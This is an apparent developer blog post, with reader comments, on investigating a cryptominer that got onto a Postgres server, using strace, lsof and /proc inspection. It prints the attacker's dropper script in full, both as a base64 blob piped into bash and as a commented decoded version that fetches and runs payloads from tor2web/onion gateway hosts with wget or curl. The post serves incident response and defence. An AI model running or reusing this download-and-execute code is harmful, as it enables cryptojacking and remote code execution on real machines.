A database machine I was handling got infected by malware, potentially a crypto miner, via a feature in Postgres. Because a recent infrastructure migration had left our security policies lax, this feature almost cost us a couple of days of hair pulling.
CVE-2019-9193: Not a Security Vulnerability
This post is an account of how I investigated the issue and thwarted the attack (hopefully :D; the rogue process has not started again, yet).
The Problem
It started with our API server logging "database not found" errors.
The database had been deleted suddenly. The Postgres logs showed that the delete command had been issued by the postgres user.
Looking at htop, there was a randomly named process, started by the postgres user, hogging all the CPU.
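htop is the quick interactive way to spot this. For a scriptable version, here is a minimal sketch that ranks one user's processes by accumulated CPU time. It assumes Linux with /proc mounted; the function name procs_by_cpu is made up for illustration, and the number it prints is total clock ticks since the process started, not the live percentage htop shows.

```shell
# Rank one user's processes by accumulated CPU time using only /proc (Linux).
# Usage: procs_by_cpu postgres      (a numeric uid works too)
# Output columns: cpu ticks, pid, command line (tab separated).
procs_by_cpu() {
    local user=$1 uid dir line rest cmd
    case $user in
        ''|*[!0-9]*) uid=$(id -u "$user") || return 1 ;;
        *)           uid=$user ;;
    esac
    for dir in /proc/[0-9]*; do
        # Skip processes owned by someone else, or ones that exited meanwhile.
        [ "$(stat -c %u "$dir" 2>/dev/null)" = "$uid" ] || continue
        line=$(cat "$dir/stat" 2>/dev/null) || continue
        # Drop the leading "pid (comm) " so the rest splits cleanly on spaces.
        rest=${line##*) }
        set -- $rest
        [ "$#" -ge 13 ] || continue
        # utime and stime are fields 14 and 15 of /proc/<pid>/stat, which are
        # positions 12 and 13 once pid and comm have been removed.
        cmd=$( { tr '\0\n\t' '   ' < "$dir/cmdline"; } 2>/dev/null )
        printf '%s\t%s\t%s\n' "$(( ${12} + ${13} ))" "${dir#/proc/}" "${cmd:-[no cmdline]}"
    done | sort -rn | head -n 10
}
```

Running `procs_by_cpu postgres` as root or as the postgres user should put a miner like the one described here at or near the top of the list.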
One thing I still have not grasped: if the intention was to use our CPU resources, why delete the database?
And how did the script know which database to delete? (It may simply have deleted every available database one by one, but since we had only one DB, it seemed odd.)
Salvage
Going by my earlier experience, I thought of just killing the process and adding restrictions to the pg_hba file for further security. But lo, 10 minutes after I killed the process, it was up again.
So we decided to recreate the machine from a backup taken a couple of days earlier. All good, right?
NO.
As you might have guessed, the server had been infected some days earlier; only the DB was deleted today. So minutes after starting the machine again, there was once again this random process hogging the CPU.
The first thing we did was to revoke the postgres user's access to our main DB, and meanwhile create a new machine from scratch and transfer our DB to it.
The Investigation
While the new machine was being created, which took a long time because of the large disk, I happened to read this article while researching Celery tasks stopping.
Celery: Distributed Task Queue
This was the article I was reading -
Using strace to Debug Stuck Celery Tasks | Caktus Group
Reading this article, I realised I could use strace and lsof to investigate my issue as well.
strace is a powerful command line tool for debugging and trouble shooting programs in Unix-like operating systems such as Linux. It captures and records all system calls made by a process and the signals received by the process.
https://www.tecmint.com/strace-commands-for-troubleshooting-and-debugging-linux/
lsof is a command meaning "list open files", which is used in many Unix-like systems to report a list of all open files and the processes that opened them.
https://en.wikipedia.org/wiki/Lsof
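As a rough sketch of how the two tools are typically pointed at an already running process: the wrapper names trace_syscalls and open_files are made up for illustration, and the flags are just one reasonable choice. Attaching usually requires root or the same user as the target process.

```shell
# Attach strace to a running process and log its system calls to a file.
# Usage: trace_syscalls PID [LOGFILE]   (stop with Ctrl-C; the process keeps running)
trace_syscalls() {
    local pid=$1 out=${2:-strace.$1.log}
    case $pid in
        ''|*[!0-9]*) echo "usage: trace_syscalls PID [LOGFILE]" >&2; return 2 ;;
    esac
    [ -d "/proc/$pid" ] || { echo "no such process: $pid" >&2; return 1; }
    # -f follows child processes, -tt adds timestamps,
    # -s 256 prints longer strings, -o writes the trace to a file.
    strace -f -tt -s 256 -p "$pid" -o "$out"
}

# List the files and sockets a process currently has open.
# Usage: open_files PID
open_files() {
    local pid=$1
    case $pid in
        ''|*[!0-9]*) echo "usage: open_files PID" >&2; return 2 ;;
    esac
    [ -d "/proc/$pid" ] || { echo "no such process: $pid" >&2; return 1; }
    # -n and -P skip host name and port name lookups, which keeps lsof fast.
    lsof -n -P -p "$pid"
}
```

Writing the strace output to a file makes it easier to search for network calls or file paths afterwards.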
Steps
- Checked strace of the CPU-hogging command (CHC). It looked like it was mostly waiting and was receiving some JSON messages every now and then.
- Checked lsof of CHC. One of its file descriptors pointed to a file in /tmp that holds the pid of another process, the main process (MP). [The /tmp/.X11-unix/11 file contained a number which, when I looked it up in the ps aux output, turned out to be another randomly named process run by the postgres user.]
- Checked strace of MP. The command was mostly sleeping. A THEORY: the MP restarts the CHC every time the CHC is killed. [Seems obvious now, I know, but validating it experimentally is something.]
- To check my theory, I killed CHC and kept monitoring htop and the strace of MP. Indeed, there was activity in the MP strace, and a couple of new commands showed up in htop under the postgres user. Voila. Theory validated.
- Now having established the relation between CHC and MP, I looked at lsof of MP. It showed a deleted file in the /var/lib/postgres folder. This file was also in the lsof output of CHC. This made me look into the folder carefully.
- When I ran ls -lah in the postgres folder, lo, the culprits. Look at the hidden files .kpccv.sh and .wget-hsts. It had also created a known-hosts file in the .ssh folder, owned by the postgres user. Finally I deleted the listed files in the folder and killed MP and CHC. It has been a few days and the server is fine; I hope all is good.
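The last two steps can be approximated without lsof by reading /proc directly. This is a minimal sketch, assuming Linux; the function names deleted_open_files and hidden_files are made up for illustration and are not what I ran at the time.

```shell
# Show the executable and any open file descriptors of a process that point
# at files which have since been deleted (lsof marks these "(deleted)" too).
# Usage: deleted_open_files PID
deleted_open_files() {
    local pid=$1 fd target
    [ -d "/proc/$pid/fd" ] || { echo "no such process: $pid" >&2; return 1; }
    for fd in "/proc/$pid/exe" /proc/"$pid"/fd/*; do
        target=$(readlink "$fd" 2>/dev/null) || continue
        case $target in
            *' (deleted)') printf '%s\t%s\n' "${fd##*/}" "$target" ;;
        esac
    done
}

# List hidden regular files directly inside a directory, with owner and mtime.
# Usage: hidden_files DIR
hidden_files() {
    local dir=$1
    find "$dir" -maxdepth 1 -type f -name '.*' -exec ls -la {} +
}
```

A binary that runs from a deleted file is a strong hint that something is trying to hide, and the directory that file lived in is a good place to run `hidden_files` on.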
Following are the contents of .kpccv.sh
#!/bin/bash
exec &>/dev/null
echo ZXhlYyAmPi9kZXYvbnVsbApleHBvcnQgUEFUSD0kUEFUSDovYmluOi9zYmluOi91c3IvYmluOi91c3Ivc2JpbjovdXNyL2xvY2FsL2JpbjovdXNyL2xvY2FsL3NiaW4KdD10ZW5jZW50eGp5NWtwY2N2CmRpcj0kKGdyZXAgeDokKGlkIC11KTogL2V0Yy9wYXNzd2R8Y3V0IC1kOiAtZjYpCmZvciBpIGluICRkaXIgL3RtcCAvdmFyL3RtcCAvZGV2L3NobSAvdXNyL2JpbiA7ZG8gZWNobyBleGl0ID4gJGkvaSAmJiBjaG1vZCAreCAkaS9pICYmIGNkICRpICYmIC4vaSAmJiBybSAtZiBpICYmIGJyZWFrO2RvbmUKeCgpIHsKZj0vaW50CmQ9Li8kKGRhdGV8bWQ1c3VtfGN1dCAtZjEgLWQtKQp3Z2V0IC10MSAtVDk5IC1xVS0gLS1uby1jaGVjay1jZXJ0aWZpY2F0ZSAkMSRmIC1PJGQgfHwgY3VybCAtbTk5IC1mc1NMa0EtICQxJGYgLW8kZApjaG1vZCAreCAkZDskZDtybSAtZiAkZAp9CnUoKSB7Cng9L2Nybgp3Z2V0IC10MSAtVDk5IC1xVS0gLU8tIC0tbm8tY2hlY2stY2VydGlmaWNhdGUgJDEkeCB8fCBjdXJsIC1tOTkgLWZzU0xrQS0gJDEkeAp9CmZvciBoIGluIGQyd2ViLm9yZyBvbmlvbi5tbiB0b3Iyd2ViLmlvIHRvcjJ3ZWIudG8gb25pb24udG8gb25pb24uaW4ubmV0IDR0b3IubWwgb25pb24uZ2xhc3MgY2l2aWNsaW5rLm5ldHdvcmsgdG9yMndlYi5zdSBvbmlvbi5seSBvbmlvbi5wZXQgb25pb24ud3MKZG8KaWYgISBscyAvcHJvYy8kKGNhdCAvdG1wLy5YMTEtdW5peC8wMHxoZWFkIC1uIDEpL2lvOyB0aGVuCnggdGVuY2VudHhqeTVrcGNjdi4kaAplbHNlCmJyZWFrCmZpCmRvbmUKCmlmICEgbHMgL3Byb2MvJChjYXQgL3RtcC8uWDExLXVuaXgvMDB8aGVhZCAtbiAxKS9pbzsgdGhlbgooCnUgJHQuZDJ3ZWIub3JnIHx8CnUgJHQub25pb24ubW4gfHwKdSAkdC50b3Iyd2ViLmlvIHx8CnUgJHQudG9yMndlYi50byB8fAp1ICR0Lm9uaW9uLnRvIHx8CnUgJHQub25pb24uaW4ubmV0IHx8CnUgJHQuNHRvci5tbCB8fAp1ICR0Lm9uaW9uLmdsYXNzIHx8CnUgJHQuY2l2aWNsaW5rLm5ldHdvcmsgfHwKdSAkdC50b3Iyd2ViLnN1IHx8CnUgJHQub25pb24ubHkgfHwKdSAkdC5vbmlvbi5wZXQgfHwKdSAkdC5vbmlvbi53cwopfGJhc2gKZmkK|base64 -d|bash
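The long string on the last line is base64, and the line pipes it through base64 -d into bash. To read the payload without running it, decode it and stop there. A minimal sketch, assuming the dropper line has the exact shape shown above; the function name decode_dropper is made up for illustration.

```shell
# Print the decoded payload of a dropper line of the form
#   echo <base64>|base64 -d|bash
# without executing it.
# Usage: decode_dropper path/to/script > payload.txt
decode_dropper() {
    local script=$1
    # Keep only the base64 argument of the echo line, then decode it.
    sed -n 's#^echo \([A-Za-z0-9+/=]*\) *|.*#\1#p' "$script" | base64 -d
}
```

The important part is what is missing: there is no trailing `|bash`, so the output is only text to read.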
Conclusions
- Keep your database port open only to trusted machines.
- Change the default port, as default ports are the ones usually attacked.
- strace and lsof are useful commands to keep in mind for system-level debugging, especially of untrusted/unknown processes.
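For the first point, one thing worth checking is whether pg_hba.conf still contains rules that accept connections from any address. A minimal sketch, assuming rules written in the CIDR form (TYPE DATABASE USER ADDRESS METHOD); the function name open_hba_rules is made up for illustration, and rules that use a separate netmask column are not handled.

```shell
# Print pg_hba.conf rules that accept connections from any address.
# Usage: open_hba_rules /path/to/pg_hba.conf
open_hba_rules() {
    awk '
        # Skip comments and blank lines.
        /^[[:space:]]*(#|$)/ { next }
        # host, hostssl, hostnossl, ... rules carry the address in column 4.
        $1 ~ /^host/ && ($4 == "0.0.0.0/0" || $4 == "::/0" || $4 == "all") { print }
    ' "$1"
}
```

Any line this prints is a candidate for narrowing down to the specific addresses of trusted machines, alongside the firewall rules.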
I am still not very clear about what exactly was happening in the attack, partly because I was too keen to remove it and didn't pry more. Comments are welcome.
Update 1.
I looked into the code that Daniel decoded. Here is a lightly commented version of it. I tried to dig deeper but got stuck at the part where it tries to reach a URL using wget or curl; the response is then piped into bash and executed. I tried using Tor Browser too, but to no avail. Maybe the endpoint has been taken down by now. It would be useful if someone could decipher more of what the code does than I have. (I only know bash scripting from SO :P)
exec &>/dev/null
export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin
t=tencentxjy5kpccv
# look up the current user in the passwd file
# (id -u gives the numeric id of the current user)
# grep x:$(id -u): matches the passwd entry of the postgres user
# and cut then picks the 6th field, splitting on ":"
# the result is the home directory of the postgres user, /var/lib/postgresql
dir=$(grep x:$(id -u): /etc/passwd|cut -d: -f6)
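# write a tiny script containing only "exit" into each directory, make it executable and run it;
# the loop stops at the first directory where all of that succeeds. This looks like a probe for
# a directory that is writable and allows execution; the script stays in that directory afterwards.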
for i in $dir /tmp /var/tmp /dev/shm /usr/bin ;do echo exit > $i/i && chmod +x $i/i && cd $i && ./i && rm -f i && break;done
x() {
: "
this function downloads <param>/int, saves it under a name derived from the md5 of the current date,
makes it executable, runs it and then deletes it (see the last line of the function).
"
f=/int
# take the md5sum of the current date, split the output on "-" and keep the first element,
# which is essentially the md5 digest of the current date
d=./$(date|md5sum|cut -f1 -d-)
#wget 1 tries, timeout 99 seconds
wget -t1 -T99 -qU- --no-check-certificate $1$f -O$d || curl -m99 -fsSLkA- $1$f -o$d
chmod +x $d;$d;rm -f $d
}
u() {
x=/crn
wget -t1 -T99 -qU- -O- --no-check-certificate $1$x || curl -m99 -fsSLkA- $1$x
}
: '
for each of the d2web.org.. strings as <h>
check whether the process whose pid is on the first line of /tmp/.X11-unix/00 is still running, by testing that /proc/<pid>/io exists
if it is not, call the function x with param tencentxjy5kpccv.<h>
'
for h in d2web.org onion.mn tor2web.io tor2web.to onion.to onion.in.net 4tor.ml onion.glass civiclink.network tor2web.su onion.ly onion.pet onion.ws
do
if ! ls /proc/$(cat /tmp/.X11-unix/00|head -n 1)/io; then
# call function x with the host name; x appends /int to it and fetches that with wget (or curl)
x tencentxjy5kpccv.$h
else
break
fi
done
if ! ls /proc/$(cat /tmp/.X11-unix/00|head -n 1)/io; then
(
# call u on each host in turn until one call succeeds; whatever it downloads is piped into bash
u $t.d2web.org ||
u $t.onion.mn ||
u $t.tor2web.io ||
u $t.tor2web.to ||
u $t.onion.to ||
u $t.onion.in.net ||
u $t.4tor.ml ||
u $t.onion.glass ||
u $t.civiclink.network ||
u $t.tor2web.su ||
u $t.onion.ly ||
u $t.onion.pet ||
u $t.onion.ws
)|bash
fi
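The guard that appears twice in the script, ls /proc/$(cat /tmp/.X11-unix/00|head -n 1)/io, is a pid-file liveness check: it only downloads again when the recorded process is gone. The same check can be turned around to see whether the miner is currently running. A minimal sketch, assuming Linux; the function name pidfile_alive is made up for illustration, and it tests for the /proc/<pid> directory rather than the io entry inside it that the script looks at.

```shell
# Return 0 if the pid on the first line of a pid file belongs to a live process.
# Usage: pidfile_alive /tmp/.X11-unix/00 && echo "still running"
pidfile_alive() {
    local file=$1 pid
    [ -r "$file" ] || return 1
    pid=$(head -n 1 "$file")
    # Reject empty or non-numeric content before touching /proc.
    case $pid in
        ''|*[!0-9]*) return 1 ;;
    esac
    [ -d "/proc/$pid" ]
}
```

This also explains why killing only the CPU-hogging process did not help: as long as something reruns the script, a missing process is exactly the condition that triggers a fresh download.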
Top comments (15)
Hey!
Have you looked at the base64 encoded payload at all?
The long string that is being echoed is piped into base64 -d, which decodes the base64, and the result is piped into bash for execution. The decoded payload that is piped into bash is the following script:
To correctly assess your situation and the impact this might have had on your systems and users you should definitely take a look to see what effects on your server and data this script might have had.
A very nice tool for this kind of forensic work is GCHQ's CyberChef. It has lots of functions for encoding and decoding different formats.
For anyone else interested, here is the malicious script after base64 decode and some tidying up:
Thanks Valts, I have added a lightly commented (whatever I could understand) version to the post itself. Please comment if I have got anything wrong there.
Thanks Daniel. Don't know why I missed the piping into the base64 -d command. I had never seen that command, so my brain skipped it :D. This has become more interesting. I am looking into what this script is doing.
Nice! Hope it's nothing too serious.
I'm also using this corona isolation time to analyze a phishing attempt against me that took place a few weeks ago.
Guess I'll be having a series of articles up over the next days :D
Very interesting stuff! Thanks a lot for sharing your experience.....
Interesting article and nice investigation work! I just checked the CVE you linked to, and it mentions that the exploit only works by connecting as postgres superuser.
Could you figure out how that exploit was executed in your case? Was it a weak postgres password, or maybe a default installation password? What did you do to tighten your server security?
No Thomas, we couldn't figure out how the exploit was executed, since we had a strong password in place, even though the default postgres port was open. We set up firewall rules and added entries to the pg_hba file to allow access only from trusted machines.
I know this is an old post, but in case you guys still want to know how the exploit was executed, I'm going to leave this here: unit42.paloaltonetworks.com/pgmine....
And thank you again, the post and the comment turned out to be extremely helpful.
Cheers
I had the same issue as well in three different isolated servers!
Thanks for the write-up. I spent a couple of hours trying to figure it out but am still scratching my head as to where the malware is coming from.
Our PostgreSQL is running in a Docker environment with a strong password. On top of that, I am only using it for development.
Do you have any suggestions on strengthening the security?
Thanks for this post. I was hit as well and traced it using the steps above.
Here are the decoded contents of the hidden file pgsql/.systemd-service.sh
Hi,
Thanks for the info.
I am facing the same malware attack and am following the articles to try to patch the leak. After you deleted the files and folders, did the malware find its way back again?
I found that we need to delete the cron task as well.
For me, the scheduled cron job looks something like this: it is owned by the user postgres and runs this command: /var/lib/postgresql/.systemd-service.sh > /dev/null 2>&1 &
I am trying to find out why and how it got into my cron tasks.
I also need to seal all the potential leaks.
If any of you have more info or advice, please share. Thanks a lot.
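A cron entry like the one described above can be looked for with a small filter. This is only a heuristic sketch: the function name suspicious_cron_lines is made up for illustration, and it simply flags crontab entries whose command references a hidden file, so legitimate dotfile paths will show up too.

```shell
# Read crontab text on stdin and print entries whose command references a
# hidden file (a path component that starts with a dot).
# Usage: crontab -l -u postgres | suspicious_cron_lines     (-u needs root)
suspicious_cron_lines() {
    # Drop comments and blank lines, then keep lines containing ".name"
    # at the start of a word or directly after a slash.
    grep -vE '^[[:space:]]*(#|$)' | grep -E '(^|[[:space:]/])\.[A-Za-z0-9_-]+'
}
```

Anything it prints can then be removed with crontab -e -u postgres, along with the script file itself.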
Excellent investigations. Thank you for sharing it. The same happened to a colleague and I'm trying to remove the malware files. By the way, can you list all files you had to delete?
Thank you, again.
Mauricio
I just want to thank you as this was the clearest path for me to find why postgres was chewing up so many cycles. Not exactly the same (filenames, etc.), but the same pattern.
Thank you!
Hi, thanks a lot for this post. It really helps in understanding what's going on on my server.